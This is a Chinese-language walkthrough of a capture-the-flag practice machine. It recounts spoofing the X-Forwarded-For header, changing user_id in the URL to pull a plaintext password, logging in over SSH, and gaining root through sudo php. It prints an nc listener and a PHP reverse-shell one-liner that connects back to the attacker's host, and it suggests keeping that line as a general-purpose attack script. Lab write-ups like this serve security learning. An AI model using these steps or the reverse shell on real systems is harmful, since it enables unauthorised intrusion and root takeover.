靶机地址:
渗透目标:
拿到靶机中的两个flag并获取靶机root权限。
渗透过程:
1.信息收集
过程不多言,我的靶机地址是20.10.4.68
2.渗透步骤
访问网站,看看网页源码,希望从中找点线索。
http请求头X-Forwarded-For可用于客户端的地址,使用firefox插件modify headers修改一下请求头,再发送。
页面上显示了一个”profile“按钮,点进去试试。
哇塞!可以注册新用户哦。整一个新用户吧!
注册成功了,就用我的名字登录吧。
登录进去后,好像又回到了以前???
怎么搞?有新用户,那肯定有老用户?想到了什么?url里面的user_id代表什么?试试改改user_id看看。
变换user_id一个一个的试试吧,总能把所有用户名给找出来的。可是木有密码呀?爆破是一个办法,但很费时间,那是不得已才使出来的神器。先用burp抓包看看。
之前知道alice的user_id是5,那就把user_id改为5,burp开启,抓包走起!
看到什么?用户名和密码是不是都出来了,密码是明文:4llic3。
知道了用户名和密码,下一步干什么?登录系统啊。ssh来一波!
进来了!那就扫荡吧~。找到了第一个flag
而且我们还有新发现:alice可以以root权限执行的命令,可以以root权限执行php命令的,而php又是可以执行本地命令的,所以就相当于alice可以执行root命令。女朋友的权限好大啊,呵呵。继续前进吧。
最后一步:不仅要做女朋友,还要做女王,提权!
在kali战斗机开启监听端口:nc -lvp 6666。我最喜欢的端口:)
在靶机上用alice账户创建一个php反弹shell去连接它:
sudo /usr/bin/php -r '$sock=fsockopen("20.10.4.67",6666);exec("/bin/bash -i <&3 >&3 2>&3");' 你可以把这个php版的shell脚本保存下来做通用攻击脚本。返回kali这边已经登录进root了,这次是闯进院子里了,扫荡吧!
这次靶机渗透有个新的知识点就是伪造http头(x-forword-for字段)欺骗服务器,另一个知识点是利用反弹shell脚本提权,这次用的是php语言版。其实这道靶机还有其他解法,比如利用系统漏洞。大家可以参照以前的文章试一试。谢谢大家!
